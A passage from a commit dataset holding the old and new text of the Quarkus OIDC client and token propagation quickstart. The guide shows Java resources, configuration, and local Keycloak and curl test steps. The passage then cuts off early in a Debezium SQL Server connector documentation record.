@Path(\"admin-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithOidcClientToken() {\n\t return restClientWithOidcClientFilter.getAdminName();\n }\n\n @GET\n @Path(\"user-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithPropagatedToken() {\n return restClientWithTokenPropagationFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithPropagatedToken() {\n return restClientWithTokenPropagationFilter.getAdminName();\n }\n}\n----\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\nFinally, lets add a JAX-RS `ExceptionMapper`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.core.Response;\nimport javax.ws.rs.ext.ExceptionMapper;\nimport javax.ws.rs.ext.Provider;\n\nimport org.jboss.resteasy.reactive.ClientWebApplicationException;\n\n@Provider\npublic class FrontendExceptionMapper implements ExceptionMapper<ClientWebApplicationException> {\n\n\t@Override\n\tpublic Response toResponse(ClientWebApplicationException t) {\n\t\treturn Response.status(t.getResponse().getStatus()).build();\n\t}\n\n}\n----\n\nThis exception mapper is only added to verify during the tests that `ProtectedResource` returns `403` when the token has no expected role. 
\n== Configuring the application\n\nWe have prepared the code, and now let's configure the application:\n\n[source,properties]\n----\n# Configure OIDC\n\n%prod.quarkus.oidc.auth-server-url=http:\/\/localhost:8180\/realms\/quarkus\nquarkus.oidc.client-id=backend-service\nquarkus.oidc.credentials.secret=secret\n\n# Tell Dev Services for Keycloak to import the realm file\n# This property is not effective when running the application in JVM or Native modes but only in dev and test modes.\n\nquarkus.keycloak.devservices.realm-path=quarkus-realm.json\n\n# Configure OIDC Client\n\nquarkus.oidc-client.auth-server-url=${quarkus.oidc.auth-server-url}\nquarkus.oidc-client.client-id=${quarkus.oidc.client-id}\nquarkus.oidc-client.credentials.secret=${quarkus.oidc.credentials.secret}\nquarkus.oidc-client.grant.type=password\nquarkus.oidc-client.grant-options.password.username=alice\nquarkus.oidc-client.grant-options.password.password=alice\n\n# Configure REST Clients\n\n%prod.port=8080\n%dev.port=8080\n%test.port=8081\n\norg.acme.security.openid.connect.client.RestClientWithOidcClientFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\norg.acme.security.openid.connect.client.RestClientWithTokenPropagationFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\n----\n\nThis configuration references Keycloak, which will be used by `ProtectedResource` to verify the incoming access tokens and by `OidcClient` to get the tokens for the user `alice` using a `password` grant. Both REST Clients point to `ProtectedResource`'s HTTP address.\n\nNOTE: Adding a `%prod.` profile prefix to `quarkus.oidc.auth-server-url` ensures that `Dev Services for Keycloak` will launch a container for you when the application is run in dev or test modes. See the <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information.\n\n== Starting and Configuring the Keycloak Server\n\nNOTE: Do not start the Keycloak server when you run the application in dev or test modes - `Dev Services for Keycloak` will launch a container. See the <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information. Make sure to put the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] on the classpath (`target\/classes` directory) so that it gets imported automatically when running in dev mode - unless you have already built a {quickstarts-tree-url}\/security-openid-connect-client-quickstart[complete solution] in which case this realm file will be added to the classpath during the build.\n\nTo start a Keycloak server, you can use Docker and run the following command:\n\n[source,bash,subs=attributes+]\n----\ndocker run --name keycloak -e KEYCLOAK_ADMIN=admin -e KEYCLOAK_ADMIN_PASSWORD=admin -p 8180:8080 quay.io\/keycloak\/keycloak:{keycloak.version} start-dev\n----\n\nwhere `keycloak.version` should be set to `17.0.0` or higher.\n\nYou should be able to access your Keycloak Server at http:\/\/localhost:8180[localhost:8180].\nLog in as the `admin` user to access the Keycloak Administration Console; the username is `admin` and the password is `admin`.\n\nImport the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] to create a new realm. For more details, see the Keycloak documentation about how to https:\/\/www.keycloak.org\/docs\/latest\/server_admin\/index.html#_create-realm[create a new realm].\n\nThis `quarkus` realm file will add a `frontend` client, and `alice` and `admin` users. `alice` has a `user` role; `admin` has both `user` and `admin` roles.\n
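\nBefore connecting the application to it, you can optionally confirm that the realm was imported and that the issuer is what the application expects by querying the standard OIDC discovery endpoint (this check is not part of the quickstart; the `jq` filter is only used for readability):\n\n[source,bash]\n----\ncurl -s http:\/\/localhost:8180\/realms\/quarkus\/.well-known\/openid-configuration | jq '.issuer'\n# should print: \"http:\/\/localhost:8180\/realms\/quarkus\"\n----\n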
\n[[keycloak-dev-mode]]\n== Running the Application in Dev mode\n\nTo run the application in dev mode, use:\n\ninclude::{includes}\/devtools\/dev.adoc[]\n\nxref:security-openid-connect-dev-services.adoc[Dev Services for Keycloak] will launch a Keycloak container and import `quarkus-realm.json`.\n\nOpen the xref:dev-ui.adoc[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] and click the `Provider: Keycloak` link in the `OpenID Connect` `Dev UI` card.\n\nYou will be asked to log in to a `Single Page Application` provided by `OpenID Connect Dev UI`:\n\n * Log in as `alice` (password: `alice`), who has a `user` role\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `403`\n * Log out and log in as `admin` (password: `admin`), who has both `admin` and `user` roles\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `200`\n\nIn this case you are testing that `FrontendResource` can propagate the access tokens acquired by `OpenID Connect Dev UI`.\n\n== Running the Application in JVM mode\n\nWhen you're done playing with dev mode, you can run the application as a standard Java application.\n\nFirst compile it:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nThen run it:\n\n[source,bash]\n----\njava -jar target\/quarkus-app\/quarkus-run.jar\n----\n\n== Running the Application in Native Mode\n\nThis same demo can be compiled into native code: no modifications required.\n\nThis implies that you no longer need to install a JVM on your\nproduction environment, as the runtime technology is included in\nthe produced binary, and optimized to run with minimal resource overhead.\n\nCompilation will take a bit longer, so this step is disabled by default;\nlet's build again by enabling the `native` profile:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAfter getting a cup of coffee, you'll be able to run this binary directly:\n\n[source,bash]\n----\n.\/target\/security-openid-connect-client-quickstart-1.0.0-SNAPSHOT-runner\n----\n\n== Testing the Application\n\nSee the <<keycloak-dev-mode, Running the Application in Dev mode>> section above about testing your application in dev mode.\n\nYou can test the application launched in JVM or Native modes with `curl`.\n\nObtain an access token for `alice`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=alice&password=alice&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nNow use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token \\\n -H 
\"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `alice` while\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `403` - recall that `alice` only has a `user` role.\n\nNext obtain an access token for `admin`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=admin&password=admin&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nand use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `admin`, and\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill also return `200` status code and the name `admin`, as `admin` has both `user` and `admin` roles.\n\n\nNow lets check `FrontendResource` methods which do not propagate the existing tokens but use `OidcClient` to acquire and propagate the tokens. You have seen that `OidcClient` is configured to acquire the tokens for the `alice` user, so:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-oidc-client`\n----\n\nwill return `200` status code and the name `alice`, but\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-oidc-client`\n----\n\nwill return `403` status code.\n\n== References\n\n* xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide]\n* xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications]\n* xref:security.adoc[Quarkus Security]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= OpenID Connect Client and Token Propagation Quickstart\n\ninclude::.\/attributes.adoc[]\n:toc:\n\nThis quickstart demonstrates how to use `OpenID Connect Client Reactive Filter` to acquire and propagate access tokens as `HTTP Authorization Bearer` access tokens, alongside `OpenID Token Propagation Reactive Filter` which propagates the incoming `HTTP Authorization Bearer` access tokens.\n\nPlease check xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide] for all the information related to `Oidc Client` and `Token Propagation` support in Quarkus.\n\nPlease also read xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications] guide if you need to protect your applications using Bearer Token Authorization.\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n* https:\/\/stedolan.github.io\/jq\/[jq tool]\n\n== Architecture\n\nIn this example, we will build an application which consists of two JAX-RS resources, `FrontendResource` and `ProtectedResource`. 
`FrontendResource` propagates access tokens to `ProtectedResource` and uses either `OpenID Connect Client Reactive Filter` to acquire a token first before propagating it or `OpenID Token Propagation Reactive Filter` to propagate the incoming, already existing access token.\n\n`FrontendResource` has 4 endpoints:\n\n* `\/frontend\/user-name-with-oidc-client-token`\n* `\/frontend\/admin-name-with-oidc-client-token`\n* `\/frontend\/user-name-with-propagated-token`\n* `\/frontend\/admin-name-with-propagated-token`\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\n`ProtecedResource` has 2 endpoints:\n\n* `\/protected\/user-name`\n* `\/protected\/admin-name`\n\nBoth of these endpoints return the username extracted from the incoming access token which was propagated to `ProtectedResource` from `FrontendResource`. The only difference between these endpoints is that calling `\/protected\/user-name` is only allowed if the current access token has a `user` role and calling `\/protected\/admin-name` is only allowed if the current access token has an `admin` role.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `security-openid-connect-quickstart` {quickstarts-tree-url}\/security-openid-connect-client-quickstart[directory].\n\n== Creating the Maven Project\n\nFirst, we need a new project. 
Create a new project with the following command:\n\n:create-app-artifact-id: security-openid-connect-client-quickstart\n:create-app-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven project, importing the `oidc`, `oidc-client-reactive-filter`, `oidc-client-reactive-filter` and `resteasy-reactive` extensions.\n\nIf you already have your Quarkus project configured, you can add these extensions to your project by running the following command in your project base directory:\n\n:add-extension-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your build file:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-client-reactive-filter<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-token-propagation-reactive<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-reactive<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\")\n----\n\n== Writing the application\n\nLet's start by implementing `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.annotation.security.RolesAllowed;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport io.quarkus.security.Authenticated;\nimport io.smallrye.mutiny.Uni;\n\nimport org.eclipse.microprofile.jwt.JsonWebToken;\n\n@Path(\"\/protected\")\n@Authenticated\npublic class ProtectedResource {\n\n @Inject\n JsonWebToken principal;\n\n @GET\n @RolesAllowed(\"user\")\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n public Uni<String> userName() {\n return Uni.createFrom().item(principal.getName());\n }\n\n @GET\n @RolesAllowed(\"admin\")\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n public Uni<String> adminName() {\n return Uni.createFrom().item(principal.getName());\n }\n}\n----\n\nAs you can see `ProtectedResource` returns a name from both `userName()` and `adminName()` methods. 
The name is extracted from the current `JsonWebToken`.\n\nNext lets add REST Client with `OpenID Connect Client Reactive Filter` and another REST Client with `OpenID Connect Token Propagation Filter`, `FrontendResource` will use these two clients to call `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.client.reactive.filter.OidcClientRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(OidcClientRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface ProtectedResourceOidcClientFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `ProtectedResourceOidcClientFilter` will depend on `OidcClientRequestReactiveFilter` to acquire and propagate the tokens and\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.token.propagation.reactive.AccessTokenRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(AccessTokenRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface ProtectedResourceTokenPropagationFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `ProtectedResourceTokenPropagationFilter` will depend on `AccessTokenRequestReactiveFilter` to propagate the incoming, already existing tokens.\n\nNote that both `ProtectedResourceOidcClientFilter` and `ProtectedResourceTokenPropagationFilter` interfaces are identical - the reason behind it is that combining `OidcClientRequestReactiveFilter` and `AccessTokenRequestReactiveFilter` on the same REST Client will cause side effects as both filters can interfere with other, for example, `OidcClientRequestReactiveFilter` may override the token propagated by `AccessTokenRequestReactiveFilter` or `AccessTokenRequestReactiveFilter` can fail if it is called when no token is available to propagate and `OidcClientRequestReactiveFilter` is expected to acquire a new token instead.\n\nNow let's complete creating the application with adding `FrontendResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.WebApplicationException;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport io.smallrye.mutiny.Uni;\n\n@Path(\"\/frontend\")\npublic class FrontendResource {\n @Inject\n @RestClient\n ProtectedResourceOidcClientFilter protectedResourceOidcClientFilter;\n\n @Inject\n @RestClient\n ProtectedResourceTokenPropagationFilter protectedResourceTokenPropagationFilter;\n\n @GET\n @Path(\"user-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithOidcClientToken() {\n return 
protectedResourceOidcClientFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithOidcClientToken() {\n\t return protectedResourceOidcClientFilter.getAdminName();\n }\n\n @GET\n @Path(\"user-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithPropagatedToken() {\n return protectedResourceTokenPropagationFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithPropagatedToken() {\n return protectedResourceTokenPropagationFilter.getAdminName();\n }\n}\n----\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\nFinally, lets add a JAX-RS `ExceptionMapper`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.core.Response;\nimport javax.ws.rs.ext.ExceptionMapper;\nimport javax.ws.rs.ext.Provider;\n\nimport org.jboss.resteasy.reactive.ClientWebApplicationException;\n\n@Provider\npublic class FrontendExceptionMapper implements ExceptionMapper<ClientWebApplicationException> {\n\n\t@Override\n\tpublic Response toResponse(ClientWebApplicationException t) {\n\t\treturn Response.status(t.getResponse().getStatus()).build();\n\t}\n\n}\n----\n\nThis exception mapper is only added to verify during the tests that `ProtectedResource` returns `403` when the token has no expected role. 
Without this mapper `RESTEasy Reactive` will correctly convert the exceptions which will escape from REST Client calls to `500` to avoid leaking the information from the downstream resources such as `ProtectedResource` but in the tests it will not be possible to assert that `500` is in fact caused by an authorization exception as opposed to some internal error.\n\n== Configuring the application\n\nWe have prepared the code, and now let's configure the application:\n\n[source,properties]\n----\n# Configure OIDC\n\n%prod.quarkus.oidc.auth-server-url=http:\/\/localhost:8180\/realms\/quarkus\nquarkus.oidc.client-id=backend-service\nquarkus.oidc.credentials.secret=secret\n\n# Tell Dev Services for Keycloak to import the realm file\n# This property is not effective when running the application in JVM or Native modes but only in dev and test modes.\n\nquarkus.keycloak.devservices.realm-path=quarkus-realm.json\n\n# Configure OIDC Client\n\nquarkus.oidc-client.auth-server-url=${quarkus.oidc.auth-server-url}\nquarkus.oidc-client.client-id=${quarkus.oidc.client-id}\nquarkus.oidc-client.credentials.secret=${quarkus.oidc.credentials.secret}\nquarkus.oidc-client.grant.type=password\nquarkus.oidc-client.grant-options.password.username=alice\nquarkus.oidc-client.grant-options.password.password=alice\n\n# Configure REST Clients\n\n%prod.port=8080\n%dev.port=8080\n%test.port=8081\n\norg.acme.security.openid.connect.client.ProtectedResourceOidcClientFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\norg.acme.security.openid.connect.client.ProtectedResourceTokenPropagationFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\n----\n\nThis configuration references Keycloak which will be used by `ProtectedResource` to verify the incoming access tokens and by `OidcClient` to get the tokens for a user `alice` using a `password` grant. Both RESTClients point to `ProtectedResource`'s HTTP address.\n\nNOTE: Adding a `%prod.` profile prefix to `quarkus.oidc.auth-server-url` ensures that `Dev Services for Keycloak` will launch a container for you when the application is run in dev or test modes. See <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information.\n\n== Starting and Configuring the Keycloak Server\n\nNOTE: Do not start the Keycloak server when you run the application in dev mode or test modes - `Dev Services for Keycloak` will launch a container. See <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information. Make sure to put the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] on the classpath (`target\/classes` directory) so that it gets imported automatically when running in dev mode - unless you have already built a {quickstarts-tree-url}\/security-openid-connect-quickstart[complete solution] in which case this realm file will be added to the classpath during the build.\n\nTo start a Keycloak Server you can use Docker and just run the following command:\n\n[source,bash,subs=attributes+]\n----\ndocker run --name keycloak -e KEYCLOAK_ADMIN=admin -e KEYCLOAK_ADMIN_PASSWORD=admin -p 8180:8080 quay.io\/keycloak\/keycloak:{keycloak.version} start-dev\n----\n\nwhere `keycloak.version` should be set to `17.0.0` or higher.\n\nYou should be able to access your Keycloak Server at http:\/\/localhost:8180[localhost:8180].\n\nLog in as the `admin` user to access the Keycloak Administration Console. 
Username should be `admin` and password `admin`.\n\nImport the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] to create a new realm. For more details, see the Keycloak documentation about how to https:\/\/www.keycloak.org\/docs\/latest\/server_admin\/index.html#_create-realm[create a new realm].\n\nThis `quarkus` realm file will add a `frontend` client, and `alice` and `admin` users. `alice` has a `user` role, `admin` - both `user` and `admin` roles.\n\n[[keycloak-dev-mode]]\n== Running the Application in Dev mode\n\nTo run the application in a dev mode, use:\n\ninclude::{includes}\/devtools\/dev.adoc[]\n\nxref:security-openid-connect-dev-services.adoc[Dev Services for Keycloak] will launch a Keycloak container and import a `quarkus-realm.json`.\n\nOpen a xref:dev-ui.adoc[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] and click on a `Provider: Keycloak` link in an `OpenID Connect` `Dev UI` card.\n\nYou will be asked to log in into a `Single Page Application` provided by `OpenID Connect Dev UI`:\n\n * Login as `alice` (password: `alice`) who has a `user` role\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `403`\n * Logout and login as `admin` (password: `admin`) who has both `admin` and `user` roles\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `200`\n\nIn this case you are testing that `FrontendResource` can propagate the access tokens acquired by `OpenID Connect Dev UI`.\n\n== Running the Application in JVM mode\n\nWhen you're done playing with the `dev` mode\" you can run it as a standard Java application.\n\nFirst compile it:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nThen run it:\n\n[source,bash]\n----\njava -jar target\/quarkus-app\/quarkus-run.jar\n----\n\n== Running the Application in Native Mode\n\nThis same demo can be compiled into native code: no modifications required.\n\nThis implies that you no longer need to install a JVM on your\nproduction environment, as the runtime technology is included in\nthe produced binary, and optimized to run with minimal resource overhead.\n\nCompilation will take a bit longer, so this step is disabled by default;\nlet's build again by enabling the `native` profile:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAfter getting a cup of coffee, you'll be able to run this binary directly:\n\n[source,bash]\n----\n.\/target\/security-openid-connect-quickstart-1.0.0-SNAPSHOT-runner\n----\n\n== Testing the Application\n\nSee <<keycloak-dev-mode, Running the Application in Dev mode>> section above about testing your application in dev mode.\n\nYou can test the application launched in JVM or Native modes with `curl`.\n\nObtain an access token for `alice`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=alice&password=alice&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nNow use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H 
\"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `alice` while\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `403` - recall that `alice` only has a `user` role.\n\nNext obtain an access token for `admin`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=admin&password=admin&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nand use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `admin`, and\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill also return `200` status code and the name `admin`, as `admin` has both `user` and `admin` roles.\n\n\nNow lets check `FrontendResource` methods which do not propagate the existing tokens but use `OidcClient` to acquire and propagate the tokens. You have seen that `OidcClient` is configured to acquire the tokens for the `alice` user, so:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-oidc-client`\n----\n\nwill return `200` status code and the name `alice`, but\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-oidc-client`\n----\n\nwill return `403` status code.\n\n== References\n\n* xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide]\n* xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications]\n* xref:security.adoc[Quarkus Security]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"08d042aa924a5920df8f0745d8db7ecc83eb68f5","subject":"DBZ-5714 Remove redundant reference to `database.names` list","message":"DBZ-5714 Remove redundant reference to `database.names` list\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/sqlserver.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/sqlserver.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-connector-for-sql-server\n[id=\"debezium-connector-for-sql-server\"]\n= {prodname} connector for SQL Server\n\n:context: sqlserver\n:data-collection: table\n:mbean-name: sql_server\n:connector-file: {context}\n:connector-class: SqlServer\n:connector-name: SQL Server\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\n[NOTE]\n====\nWant to help us further hone and improve it? 
link:\/docs\/contribute\/[Learn how].\n====\n\ntoc::[]\nendif::community[]\n\nThe {prodname} SQL Server connector captures row-level changes that occur in the schemas of a SQL Server database.\n\nifdef::community[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nFor details about the {prodname} SQL Server connector and its use, see the following topics:\n\n* xref:overview-of-debezium-sql-server-connector[]\n* xref:how-debezium-sql-server-connectors-work[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:how-debezium-sql-server-connectors-map-data-types[]\n* xref:setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[]\n* xref:deployment-of-debezium-sql-server-connectors[]\n* xref:refreshing-capture-tables-after-a-schema-change[]\n* xref:monitoring-debezium-sql-server-connector-performance[]\n\nendif::product[]\n\nThe first time that the {prodname} SQL Server connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas in the database.\nAfter the initial snapshot is complete, the connector continuously captures row-level changes for `INSERT`, `UPDATE`, or `DELETE` operations that are committed to the SQL Server databases that are enabled for CDC.\nThe connector produces events for each data change operation, and streams them to Kafka topics.\nThe connector streams all of the events for a table to a 